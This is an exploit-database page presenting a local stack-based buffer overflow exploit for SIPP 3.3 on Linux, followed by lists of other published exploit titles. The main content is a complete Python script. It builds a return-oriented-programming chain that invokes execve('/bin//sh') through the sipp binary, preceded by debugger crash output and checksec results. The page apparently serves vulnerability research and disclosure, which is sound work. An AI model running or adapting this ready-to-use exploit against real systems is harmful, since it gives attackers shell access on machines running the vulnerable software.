Menu

Search for hundreds of thousands of exploits

"SIPP 3.3 - Stack-Based Buffer Overflow"

Author

Exploit author

"Juan Sacco"

Platform

Exploit platform

linux

Release date

Exploit published date

2018-08-29

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
#
# Tested on: Kali i686 GNU/Linux
#
# Description: SIPP 3.3 is prone to a local unauthenticated stack-based overflow
# The vulnerability is due to an unproper filter of user suppliedinput while reading
# the configuration file and parsing the malicious crafted value.
#
# Program: SIPP 3.3 Traffic generator for the SIP protocol
# SIPp is a free Open Source test tool / traffic generator
# for the SIP protocol. Filename: pool/main/s/sipp/sipp_3.3-1kali2_i386.deb
#
# Vendor: http://sipp.sourceforge.net/
# gdb-peda$ checksec
# CANARY    : disabled
# FORTIFY   : disabled
# NX        : ENABLED
# PIE       : ENABLED
# RELRO     : Partial
#
#[----------------------------------registers-----------------------------------]
# EAX: 0x41414141 ('AAAA')
# EBX: 0x25 ('%')
# ECX: 0xb7c9e340 --> 0x4cf8b0 ('A' <repeats 200 times>...)
# EDX: 0xb7c9e200 --> 0x0
# ESI: 0xb7ca0748 --> 0x0
# EDI: 0x0
# EBP: 0xbfffc898 --> 0xbfffc8c8 --> 0xbfffc8e8 --> 0xbfffc908 -->0xb7c9d000 --> 0x1d4d6c
# ESP: 0xbfffc898 --> 0xbfffc8c8 --> 0xbfffc8e8 --> 0xbfffc908 -->0xb7c9d000 --> 0x1d4d6c
# EIP: 0x43cdcf (mov    eax,DWORD PTR [eax+0xc])
# EFLAGS: 0x10216 (carry PARITY ADJUST zero sign trap INTERRUPTdirection overflow)
# [-------------------------------------code-------------------------------------]
#   0x43cdc2: call   0x4053e6
#   0x43cdc7: add    eax,0x50239
#   0x43cdcc: mov    eax,DWORD PTR [ebp+0x8]
# => 0x43cdcf: mov    eax,DWORD PTR [eax+0xc]
#   0x43cdd2: pop    ebp
#   0x43cdd3: ret
#   0x43cdd4: push   ebp
#   0x43cdd5: mov    ebp,esp
# [------------------------------------stack-------------------------------------]
# 0000| 0xbfffc898 --> 0xbfffc8c8 --> 0xbfffc8e8 --> 0xbfffc908 -->0xb7c9d000 --> 0x1d4d6c
# 0004| 0xbfffc89c --> 0x43c159 (add    esp,0x10)
# 0008| 0xbfffc8a0 ("AAAA\377\377\377\377\310\310\377\277C\301C")
# 0012| 0xbfffc8a4 --> 0xffffffff
# 0016| 0xbfffc8a8 --> 0xbfffc8c8 --> 0xbfffc8e8 --> 0xbfffc908 -->0xb7c9d000 --> 0x1d4d6c
# 0020| 0xbfffc8ac --> 0x43c143 (add    eax,0x50ebd)
# 0024| 0xbfffc8b0 --> 0x597ba0 --> 0x0
# 0028| 0xbfffc8b4 --> 0xffffffff
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x41414141 in ?? ()

import os, subprocess
from struct import pack

# rop execve ( bin/sh )
rop = "A"*2208 # junk
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi; pop ebp ; ret
rop += pack('<I', 0x0811abe0) # @ .data
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x0807b744) # pop eax ; ret
rop += '/bin'
rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; popedi ;pop ebp ; ret
rop += pack('<I', 0x0811abe4) # @ .data + 4
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x0807b744) # pop eax ; ret
rop += '//sh'
rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi; pop ebp ; ret
rop += pack('<I', 0x0811abe8) # @ .data + 8
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080dcf4b) # pop ebx ; pop esi ; pop edi ; ret
rop += pack('<I', 0x0811abe0) # @ .data
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x08067b43) # pop ecx ; ret
rop += pack('<I', 0x0811abe8) # @ .data + 8
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi; pop ebp ; ret
rop += pack('<I', 0x0811abe8) # @ .data + 8
rop += pack('<I', 0x0811abe0) # padding without overwrite ebx
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080c861f) # int 0x80

try:
   print("[*] SIPP 3.3 Buffer Overflow by Juan Sacco")
   print("[*] Please wait.. running")
   subprocess.call(["sipp ", rop])
except OSError as e:
   if e.errno == os.errno.ENOENT:
       print "SIPP  not found!"
   else:
    print "Error executing exploit"
   raise
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2019-06-17 "Netperf 2.6.0 - Stack-Based Buffer Overflow" dos linux "Juan Sacco"
2018-08-29 "SIPP 3.3 - Stack-Based Buffer Overflow" local linux "Juan Sacco"
2018-05-16 "WhatsApp 2.18.31 - Memory Corruption" dos ios "Juan Sacco"
2018-04-24 "Kaspersky KSN for Linux 5.2 - Memory Corruption" dos linux "Juan Sacco"
2018-04-09 "PMS 0.42 - Local Stack-Based Overflow (ROP)" local linux "Juan Sacco"
2018-03-23 "Crashmail 1.6 - Stack-Based Buffer Overflow (ROP)" local linux "Juan Sacco"
2018-03-12 "SC 7.16 - Stack-Based Buffer Overflow" local linux "Juan Sacco"
2018-02-21 "EChat Server 3.1 - 'CHAT.ghp' Buffer Overflow" remote windows "Juan Sacco"
2018-02-07 "Asterisk 13.17.2 - 'chan_skinny' Remote Memory Corruption" dos multiple "Juan Sacco"
2018-02-05 "BOCHS 2.6-5 - Local Buffer Overflow" local linux "Juan Sacco"
2017-11-01 "WhatsApp 2.17.52 - Memory Corruption" dos ios "Juan Sacco"
2017-07-24 "MAWK 1.3.3-17 - Local Buffer Overflow" local linux "Juan Sacco"
2017-06-28 "Flat Assembler 1.7.21 - Local Buffer Overflow" local linux "Juan Sacco"
2017-06-26 "JAD Java Decompiler 1.5.8e - Local Buffer Overflow (NX Enabled)" local linux "Juan Sacco"
2017-06-09 "Mapscrn 2.03 - Local Buffer Overflow (PoC)" dos linux "Juan Sacco"
2017-05-30 "TiEmu 2.08 - Local Buffer Overflow" local windows "Juan Sacco"
2017-05-26 "JAD Java Decompiler 1.5.8e - Local Buffer Overflow" local linux "Juan Sacco"
2017-05-10 "Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)" remote windows_x86-64 "Juan Sacco"
2017-01-16 "iSelect v1.4 - Local Buffer Overflow" local linux "Juan Sacco"
2016-10-27 "GNU GTypist 2.9.5-2 - Local Buffer Overflow" local linux "Juan Sacco"
2016-09-19 "EKG Gadu 1.9~pre+r2855-3+b1 - Local Buffer Overflow" local linux "Juan Sacco"
2016-08-05 "zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow" local linux "Juan Sacco"
2016-06-27 "HNB 1.9.18-10 - Local Buffer Overflow" local linux "Juan Sacco"
2016-06-27 "PInfo 0.6.9-5.1 - Local Buffer Overflow" local linux "Juan Sacco"
2016-05-13 "NRSS Reader 0.3.9 - Local Stack Overflow" local linux "Juan Sacco"
2016-05-04 "TRN Threaded USENET News Reader 3.6-23 - Local Stack Overflow" local linux "Juan Sacco"
2016-04-26 "Yasr Screen Reader 0.6.9 - Local Buffer Overflow" local linux "Juan Sacco"
2016-04-13 "Texas Instrument Emulator 3.03 - Local Buffer Overflow" local linux "Juan Sacco"
2016-04-07 "Mess Emulator 0.154-3.1 - Local Buffer Overflow" local linux "Juan Sacco"
2016-02-03 "yTree 1.94-1.1 - Local Buffer Overflow (PoC)" dos linux "Juan Sacco" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected